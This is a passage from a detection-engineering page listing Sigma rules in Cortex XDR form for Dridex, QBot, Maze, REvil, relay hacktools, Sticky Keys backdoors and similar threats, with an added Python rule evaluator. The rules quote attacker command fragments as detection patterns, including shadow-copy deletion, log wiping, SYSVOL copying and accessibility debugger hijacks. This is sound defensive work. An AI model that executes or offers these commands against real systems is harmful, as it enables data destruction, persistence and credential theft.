1,524 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Rules in this view by ATT&CK tactic: Reconnaissance 4 · Resource Development 5 · Initial Access 7 · Execution 25 · Persistence 31 · Privilege Escalation 17 · Stealth 63 · Defense Impairment 16 · Credential Access 26 · Discovery 24 · Lateral Movement 10 · Collection 11 · Command and Control 18 · Exfiltration 7 · Impact 10
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
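The Validate step above is easiest to reason about if you can run a rule's detection block over a handful of events yourself before you touch Atomic Red Team. The evaluator below is an added example, not code from this site or from the SigmaHQ project: it implements the subset of Sigma the rules on this page actually use (the endswith, startswith, contains, contains|all, re and exact modifiers, and conditions built from and/or/not, parentheses, "1 of x*" and "all of x*"), transcribes the Dridex detection block from this page into a Python dict, and runs it over constructed process_creation events, one true positive per condition branch next to the benign or filtered twin that must stay quiet.

```python
"""Minimal Sigma rule evaluator for process_creation events. Added example, not the
page's or SigmaHQ's code; the sample events are constructed, not real telemetry.
Covers the modifiers used on this page and and/or/not, parentheses, '1 of', 'all of'."""
import fnmatch
import re

def _compare(value, modifiers, needle):
    """One modifier chain on one value; Sigma string matching is case-insensitive, 're' is not."""
    if "re" in modifiers:
        return re.search(needle, str(value)) is not None
    v, n = str(value).lower(), str(needle).lower()
    if "endswith" in modifiers:
        return v.endswith(n)
    if "startswith" in modifiers:
        return v.startswith(n)
    if "contains" in modifiers:
        return n in v
    return v == n

def _field_matches(event, spec, needles):
    """spec is e.g. 'CommandLine|contains|all'; a list of needles is OR unless '|all' is present."""
    field, *modifiers = spec.split("|")
    needles = needles if isinstance(needles, list) else [needles]
    hits = [_compare(event.get(field, ""), modifiers, n) for n in needles]
    return all(hits) if "all" in modifiers else any(hits)

def selection_matches(event, selection):
    """Keys inside one selection map are ANDed; a list of maps is ORed."""
    if isinstance(selection, list):
        return any(selection_matches(event, s) for s in selection)
    return all(_field_matches(event, k, v) for k, v in selection.items())

_TOKEN = re.compile(r"\(|\)|\b(?:and|or|not|1 of|all of)\b|[\w*]+")

def evaluate_condition(condition, results):
    """Recursive-descent evaluation of a Sigma condition over {selection_name: bool}."""
    tokens = _TOKEN.findall(condition)
    def atom():
        tok = tokens.pop(0)
        if tok == "(":
            val = expr()
            tokens.pop(0)  # the closing ')'
            return val
        if tok == "not":
            return not atom()
        if tok in ("1 of", "all of"):  # quantifier over selection names matching a wildcard
            pattern = tokens.pop(0)
            names = [n for n in results if fnmatch.fnmatchcase(n, pattern)]
            return (any if tok == "1 of" else all)(results[n] for n in names)
        return results[tok]
    def term():  # 'and' binds tighter than 'or'; both sides are always evaluated
        val = atom()
        while tokens and tokens[0] == "and":
            tokens.pop(0)
            rhs = atom()
            val = val and rhs
        return val
    def expr():
        val = term()
        while tokens and tokens[0] == "or":
            tokens.pop(0)
            rhs = term()
            val = val or rhs
        return val
    return expr()

def rule_matches(event, detection):
    """True when the rule's condition holds for this event."""
    results = {k: selection_matches(event, v) for k, v in detection.items() if k != "condition"}
    return evaluate_condition(detection["condition"], results)

# Detection block of "Potential Dridex Activity" (e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e), transcribed from this page.
DRIDEX = {
    "selection_svchost": {"Image|endswith": "\\svchost.exe",
                          "CommandLine|contains|all": ["C:\\Users\\", "\\Desktop\\"]},
    "filter_svchost": {"ParentImage|startswith": "C:\\Windows\\System32\\"},
    "selection_regsvr": {"ParentImage|endswith": "\\excel.exe", "Image|endswith": "\\regsvr32.exe",
                         "CommandLine|contains": [" -s ", "\\AppData\\Local\\Temp\\"]},
    "filter_regsvr": {"CommandLine|contains": ".dll"},
    "selection_anomaly_parent": {"ParentImage|endswith": "\\svchost.exe"},
    "selection_anomaly_child_1": {"Image|endswith": "\\whoami.exe", "CommandLine|contains": " /all"},
    "selection_anomaly_child_2": {"Image|endswith": ["\\net.exe", "\\net1.exe"], "CommandLine|contains": " view"},
    "condition": "(selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) "
                 "or (selection_anomaly_parent and 1 of selection_anomaly_child_*)",
}

S32, EXCEL = "C:\\Windows\\System32\\", "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
SAMPLE_EVENTS = [dict(zip(("name", "Image", "CommandLine", "ParentImage"), row)) for row in [  # constructed
    ("svchost_desktop_odd_parent", S32 + "svchost.exe", "svchost.exe C:\\Users\\bob\\Desktop\\inv.bin", "C:\\Users\\bob\\AppData\\Local\\Temp\\drop.exe"),
    ("svchost_desktop_system_parent", S32 + "svchost.exe", "svchost.exe C:\\Users\\bob\\Desktop\\inv.bin", S32 + "services.exe"),
    ("excel_regsvr32_ocx", S32 + "regsvr32.exe", "regsvr32.exe -s C:\\Users\\bob\\AppData\\Local\\Temp\\a.ocx", EXCEL),
    ("excel_regsvr32_dll", S32 + "regsvr32.exe", "regsvr32.exe -s C:\\Users\\bob\\AppData\\Local\\Temp\\a.dll", EXCEL),
    ("svchost_spawns_whoami_all", S32 + "whoami.exe", "whoami /all", S32 + "svchost.exe"),
    ("svchost_spawns_net_view", S32 + "net.exe", "net view", S32 + "svchost.exe"),
    ("explorer_spawns_net_use", S32 + "net.exe", "net use Z: \\\\fs01\\share", "C:\\Windows\\explorer.exe"),
]]

def run_samples(detection=DRIDEX, events=SAMPLE_EVENTS):
    # Map each sample event name to whether the rule fires on it.
    return {e["name"]: rule_matches(e, detection) for e in events}
```

Swap any other process_creation rule from this page into the detection dict (the registry and file_event rules work the same way once you feed TargetObject or TargetFilename) and put your own benign events beside the true positives; a rule that fires on the twin is the one to tune first, whatever its FP tier says.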
Detection rules (50 shown of 1,524)
critical · Strong · Medium FP
Potential Dridex Activity
title: Potential Dridex Activity
id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e
status: stable
description: Detects potential Dridex activity via specific process patterns
references:
    - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
    - https://redcanary.com/threat-detection-report/threats/dridex/
author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2019-01-10
modified: 2023-02-03
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - attack.discovery
    - attack.t1135
    - attack.t1033
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_svchost:
        Image|endswith: '\svchost.exe'
        CommandLine|contains|all:
            - 'C:\Users\'
            - '\Desktop\'
    filter_svchost:
        ParentImage|startswith: 'C:\Windows\System32\'
    selection_regsvr:
        ParentImage|endswith: '\excel.exe'
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains:
            - ' -s '
            - '\AppData\Local\Temp\'
    filter_regsvr:
        CommandLine|contains: '.dll'
    selection_anomaly_parent:
        ParentImage|endswith: '\svchost.exe'
    selection_anomaly_child_1:
        Image|endswith: '\whoami.exe'
        CommandLine|contains: ' /all'
    selection_anomaly_child_2:
        Image|endswith:
            - '\net.exe'
            - '\net1.exe'
        CommandLine|contains: ' view'
    condition: (selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)
falsepositives:
    - Unlikely
level: critical
critical · Strong · Medium FP
Potential Dtrack RAT Activity
title: Potential Dtrack RAT Activity
id: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4
status: stable
description: Detects potential Dtrack RAT activity via specific process patterns
references:
    - https://securelist.com/my-name-is-dtrack/93338/
    - https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
    - https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/
    - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/
    - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2019-10-30
modified: 2025-11-03
tags:
    - attack.impact
    - attack.t1490
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_ping:
        CommandLine|re: 'ping\s+-n.{6,64}echo EEEE\s?>\s?'
    selection_ipconfig:
        CommandLine|re: 'ipconfig\s+/all'
        CommandLine|contains: '\temp\res.ip'
    selection_netsh:
        CommandLine|contains|all:
            - 'interface ip show config'
            - '\temp\netsh.res'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical · Strong · Medium FP
Potential Maze Ransomware Activity
title: Potential Maze Ransomware Activity
id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052
status: test
description: Detects specific process characteristics of Maze ransomware Word document droppers
references:
    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
    - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/
    - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/
author: Florian Roth (Nextron Systems)
date: 2020-05-08
modified: 2023-02-13
tags:
    - attack.execution
    - attack.t1204.002
    - attack.t1047
    - attack.impact
    - attack.t1490
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    # Dropper
    selection1:
        ParentImage|endswith: '\WINWORD.exe'
        Image|endswith: '.tmp'
    # Binary Execution
    selection2:
        Image|endswith: '\wmic.exe'
        ParentImage|contains: '\Temp\'
        CommandLine|endswith: 'shadowcopy delete'
    # Specific Pattern
    selection3:
        CommandLine|endswith: 'shadowcopy delete'
        CommandLine|contains: '\..\..\system32'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical
critical · Strong · Medium FP
Potential QBot Activity
title: Potential QBot Activity
id: 4fcac6eb-0287-4090-8eea-2602e4c20040
status: stable
description: Detects potential QBot activity by looking for process executions used previously by QBot
references:
    - https://twitter.com/killamjr/status/1179034907932315648
    - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
author: Florian Roth (Nextron Systems)
date: 2019-10-01
modified: 2023-02-03
tags:
    - attack.execution
    - attack.t1059.005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        ParentImage|endswith: '\WinRAR.exe'
        Image|endswith: '\wscript.exe'
    selection2:
        CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '
    selection3:
        CommandLine|contains|all:
            - 'regsvr32.exe'
            - 'C:\ProgramData'
            - '.tmp'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical
critical · Strong · High FP
Potential Russian APT Credential Theft Activity
title: Potential Russian APT Credential Theft Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
status: stable
description: Detects Russian group activity as described in the CrowdStrike Global Threat Report 2019
references:
    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
author: Florian Roth (Nextron Systems)
date: 2019-02-21
modified: 2023-03-08
tags:
    - attack.credential-access
    - attack.t1552.001
    - attack.t1003.003
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_xcopy:
        CommandLine|contains|all:
            - 'xcopy /S /E /C /Q /H \\\\'
            - '\sysvol\'
    selection_adexplorer:
        CommandLine|contains|all:
            - 'adexplorer -snapshot "" c:\users\'
            - '\downloads\'
            - '.snp'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical · Strong · Medium FP
Potential SMB Relay Attack Tool Execution
title: Potential SMB Relay Attack Tool Execution
id: 5589ab4f-a767-433c-961d-c91f3f704db1
status: test
description: Detects different hacktools used for relay attacks on Windows for privilege escalation
references:
    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
    - https://pentestlab.blog/2017/04/13/hot-potato/
    - https://github.com/ohpe/juicy-potato
    - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes
    - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
    - https://www.localpotato.com/
author: Florian Roth (Nextron Systems)
date: 2021-07-24
modified: 2023-02-14
tags:
    - attack.collection
    - attack.execution
    - attack.credential-access
    - attack.t1557.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_pe:
        Image|contains:
            - 'PetitPotam'
            - 'RottenPotato'
            - 'HotPotato'
            - 'JuicyPotato'
            - '\just_dce_'
            - 'Juicy Potato'
            - '\temp\rot.exe'
            - '\Potato.exe'
            - '\SpoolSample.exe'
            - '\Responder.exe'
            - '\smbrelayx'
            - '\ntlmrelayx'
            - '\LocalPotato'
    selection_script:
        CommandLine|contains:
            - 'Invoke-Tater'
            - ' smbrelay'
            - ' ntlmrelay'
            - 'cme smb '
            - ' /ntlm:NTLMhash '
            - 'Invoke-PetitPotam'
            - '.exe -t * -p ' # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG
    selection_juicypotato_enum: # appears when JuicyPotatoNG is used with -b
        CommandLine|contains: '.exe -c "{'
        CommandLine|endswith: '}" -z'
    filter_hotpotatoes: # known goodware https://hotpot.uvic.ca/
        Image|contains:
            - 'HotPotatoes6'
            - 'HotPotatoes7'
            - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial'
    condition: 1 of selection_* and not 1 of filter_*
falsepositives:
    - Legitimate files with these rare hacktool names
level: critical
critical · Moderate · High FP
Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
id: ba479447-721f-42a9-9af2-6dcd517bbdb3
status: experimental
description: |
    Detects the creation of files such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
    CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
references:
    - https://research.eye.security/sharepoint-under-siege/
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-07-21
modified: 2025-07-24
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2025-53770
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|startswith:
            - 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\'
            - 'C:\Program Files (x86)\Common Files\Microsoft Shared\Web Server Extensions\'
        TargetFilename|contains:
            - '\15\TEMPLATE\LAYOUTS\'
            - '\16\TEMPLATE\LAYOUTS\'
        TargetFilename|endswith:
            - '\spinstall.aspx'
            - '\spinstall?.aspx'
            - '\debug_dev.js'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical · Moderate · High FP
Potential SystemNightmare Exploitation Attempt
title: Potential SystemNightmare Exploitation Attempt
id: c01f7bd6-0c1d-47aa-9c61-187b91273a16
status: test
description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
references:
    - https://github.com/GossiTheDog/SystemNightmare
author: Florian Roth (Nextron Systems)
date: 2021-08-11
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.t1068
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'printnightmare.gentilkiwi.com'
            - ' /user:gentilguest '
            - 'Kiwi Legit Printer'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical · Strong · Medium FP
PrinterNightmare Mimikatz Driver Name
title: PrinterNightmare Mimikatz Driver Name
id: ba6b9e43-1d45-4d3c-a504-1043a64c8469
status: test
description: Detects the static 'QMS 810' and 'mimikatz' printer driver names used by Mimikatz when exploiting CVE-2021-1675 and CVE-2021-34527
references:
    - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760
    - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf
    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913
    - https://nvd.nist.gov/vuln/detail/cve-2021-1675
    - https://nvd.nist.gov/vuln/detail/cve-2021-34527
author: Markus Neis, @markus_neis, Florian Roth
date: 2021-07-04
modified: 2023-06-12
tags:
    - attack.execution
    - attack.t1204
    - cve.2021-1675
    - cve.2021-34527
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_event
detection:
    selection:
        TargetObject|contains:
            - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\'
            - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz'
    selection_alt:
        TargetObject|contains|all:
            - 'legitprinter'
            - '\Control\Print\Environments\Windows'
    selection_print:
        TargetObject|contains:
            - '\Control\Print\Environments'
            - '\CurrentVersion\Print\Printers'
    selection_kiwi:
        TargetObject|contains:
            - 'Gentil Kiwi'
            - 'mimikatz printer'
            - 'Kiwi Legit Printer'
    condition: selection or selection_alt or (selection_print and selection_kiwi)
falsepositives:
    - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
level: critical
critical · Strong · Medium FP
Qakbot Rundll32 Exports Execution
title: Qakbot Rundll32 Exports Execution
id: 339ed3d6-5490-46d0-96a7-8abe33078f58
status: test
description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
references:
    - https://github.com/pr0xylife/Qakbot/
author: X__Junior (Nextron Systems)
date: 2023-05-24
modified: 2023-05-30
tags:
    - attack.execution
    - detection.emerging-threats
    - attack.stealth
logsource:
    product: windows
    category: process_creation
detection:
    selection_paths:
        ParentImage|endswith:
            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
            - '\cmd.exe'
            - '\cscript.exe'
            - '\curl.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
        Image|endswith: '\rundll32.exe'
        CommandLine|contains:
            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
            - ':\ProgramData\'
            - ':\Users\Public\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
    selection_exports:
        CommandLine|endswith:
            # Note: Only add additional exports seen used by Qakbot
            - 'aslr' # https://tria.ge/230524-scgq9add9v/behavioral1#report
            - 'bind'
            - 'DrawThemeIcon'
            - 'GG10'
            - 'GL70'
            - 'jhbvygftr'
            - 'kjhbhkjvydrt'
            - 'LS88'
            - 'Motd'
            - 'N115'
            - 'next' # https://tria.ge/230530-n3rxpahf9w/behavioral2
            - 'Nikn'
            - 'print'
            - 'qqqb'
            - 'qqqq'
            - 'RS32'
            - 'Test'
            - 'Time'
            - 'Updt'
            - 'vips'
            - 'Wind'
            - 'WW50'
            - 'X555'
            - 'XL55'
            - 'xlAutoOpen'
            - 'XS88'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: critical
critical · Moderate · Medium FP
Qakbot Rundll32 Fake DLL Extension Execution
title: Qakbot Rundll32 Fake DLL Extension Execution
id: bfd34392-c591-4009-b938-9fd985a28b85
status: test
description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
references:
    - https://github.com/pr0xylife/Qakbot/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-24
tags:
    - attack.execution
    - detection.emerging-threats
    - attack.stealth
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|endswith:
            # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
            - '\cmd.exe'
            - '\cscript.exe'
            - '\curl.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\wscript.exe'
        Image|endswith: '\rundll32.exe'
        CommandLine|contains:
            # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
            - ':\ProgramData\'
            - ':\Users\Public\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
    filter_main_extension:
        CommandLine|contains: '.dll'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: critical
critical · Strong · Medium FP
REvil Kaseya Incident Malware Patterns
title: REvil Kaseya Incident Malware Patterns
id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5
status: test
description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
references:
    - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
    - https://www.joesandbox.com/analysis/443736/0/html
    - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
    - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
    - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
author: Florian Roth (Nextron Systems)
date: 2021-07-03
modified: 2022-05-20
tags:
    - attack.execution
    - attack.t1059
    - attack.g0115
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains:
            - 'C:\Windows\cert.exe'
            - 'del /q /f c:\kworking\agent.crt'
            - 'Kaseya VSA Agent Hot-fix'
            - '\AppData\Local\Temp\MsMpEng.exe'
            - 'rmdir /s /q %SystemDrive%\inetpub\logs'
            - 'del /s /q /f %SystemDrive%\\*.log'
            - 'c:\kworking1\agent.exe'
            - 'c:\kworking1\agent.crt'
    selection2:
        Image:
            - 'C:\Windows\MsMpEng.exe'
            - 'C:\Windows\cert.exe'
            - 'C:\kworking\agent.exe'
            - 'C:\kworking1\agent.exe'
    selection3:
        CommandLine|contains|all:
            - 'del /s /q /f'
            - 'WebPages\Errors\webErrorLog.txt'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
critical · Moderate · High FP
RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
title: RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
id: f2e4b7d9-5c3a-4f8b-9e1d-7a6c2b3f4e5d
status: experimental
description: |
    Detects the creation of a file named TieringEngineService.exe inside a directory whose path contains the RS- prefix characteristic
    of RedSun's staging directory (e.g. %TEMP%\RS-{GUID}\TieringEngineService.exe).
    RedSun registers a Cloud Files sync root under this RS-prefixed path and drops a masqueraded placeholder there as part of its oplock-based AV bypass and privilege escalation chain.
    The RS-{GUID} directory name is generated by RedSun itself and has no legitimate system usage,
    making the combination of this path prefix and the TieringEngineService.exe filename a highly
    specific indicator of RedSun activity.
references:
    - https://github.com/Nightmare-Eclipse/RedSun/blob/7456cc8cf066f5e5fc6cdf7d3272a466ebd6b2f6/RedSun.cpp#L591
    - https://deadeclipse666.blogspot.com/2026/04/public-disclosure-response-for-cve-2026.html
author: Swachchhanda Shrawan Poudel (Nextron Systems), @unresolvedhost
date: 2026-04-17
tags:
    - attack.stealth
    - attack.t1036.005
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - '\Temp'
            - '\RS-{'
        TargetFilename|endswith: '\TieringEngineService.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
regression_tests_path: regression_data/rules-emerging-threats/2026/Exploits/RedSun/file_event_win_exploit_redsun_indicators/info.yml
critical · Moderate · Medium FP
Rorschach Ransomware Execution Activity
title: Rorschach Ransomware Execution Activity
id: 0e9e6c63-1350-48c4-9fa1-7ccb235edc68
status: test
description: Detects Rorschach ransomware execution activity
references:
    - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
author: X__Junior (Nextron Systems)
date: 2023-04-04
modified: 2023-04-22
tags:
    - attack.execution
    - attack.t1059.003
    - attack.t1059.001
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\bcdedit.exe'
            - '\net.exe'
            - '\net1.exe'
            - '\netsh.exe'
            - '\wevtutil.exe'
            - '\vssadmin.exe'
        CommandLine|contains: '11111111'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical · Moderate · Medium FP
SNAKE Malware Kernel Driver File Indicator
title: SNAKE Malware Kernel Driver File Indicator
id: d6d9d23f-69c1-41b5-8305-fa8250bd027f
status: test
description: Detects SNAKE malware kernel driver file indicator
references:
    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-10
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename: 'C:\Windows\System32\Com\Comadmin.dat'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical · Moderate · Medium FP
Serv-U Exploitation CVE-2021-35211 by DEV-0322
title: Serv-U Exploitation CVE-2021-35211 by DEV-0322
id: 75578840-9526-4b2a-9462-af469a45e767
status: test
description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
references:
    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
author: Florian Roth (Nextron Systems)
date: 2021-07-14
modified: 2022-12-18
tags:
    - attack.persistence
    - attack.t1136.001
    - cve.2021-35211
    - detection.emerging-threats
    # - threat_group.DEV-0322
logsource:
    category: process_creation
    product: windows
detection:
    selection_whoami:
        CommandLine|contains: 'whoami'
    selection_cmd_1:
        CommandLine|contains:
            - './Client/Common/'
            - '.\Client\Common\'
    selection_cmd_2:
        CommandLine|contains: 'C:\Windows\Temp\Serv-U.bat'
    condition: selection_whoami and 1 of selection_cmd*
falsepositives:
    - Unlikely
level: critical
critical · Moderate · High FP
Sticky Key Like Backdoor Execution
title: Sticky Key Like Backdoor Execution
id: 2fdefcb3-dbda-401e-ae23-f0db027628bc
related:
    - id: baca5663-583c-45f9-b5dc-ea96a22ce542
      type: derived
status: test
description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
references:
    - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
date: 2018-03-15
modified: 2023-03-07
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.008
    - car.2014-11-003
    - car.2014-11-008
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\winlogon.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\wscript.exe'
            - '\wt.exe'
        CommandLine|contains:
            - 'sethc.exe'
            - 'utilman.exe'
            - 'osk.exe'
            - 'Magnify.exe'
            - 'Narrator.exe'
            - 'DisplaySwitch.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical · Moderate · High FP
Sticky Key Like Backdoor Usage - Registry
title: Sticky Key Like Backdoor Usage - Registry
id: baca5663-583c-45f9-b5dc-ea96a22ce542
status: test
description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
references:
    - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
    - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
date: 2018-03-15
modified: 2022-11-26
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.008
    - car.2014-11-003
    - car.2014-11-008
logsource:
    category: registry_event
    product: windows
detection:
    selection_registry:
        TargetObject|endswith:
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger'
            - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger'
    condition: selection_registry
falsepositives:
    - Unlikely
level: critical
critical · Strong · Medium FP
Suspicious Child Process Of Veeam Database
title: Suspicious Child Process Of Veeam Database
id: d55b793d-f847-4eea-b59a-5ab09908ac90
related:
    - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445
      type: similar
status: test
description: Detects suspicious child processes of the SQL Server instance that hosts the Veeam database (sqlservr.exe started with VEEAMSQL in its command line). This could indicate RCE or SQL injection against the Veeam server.
references:
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-04
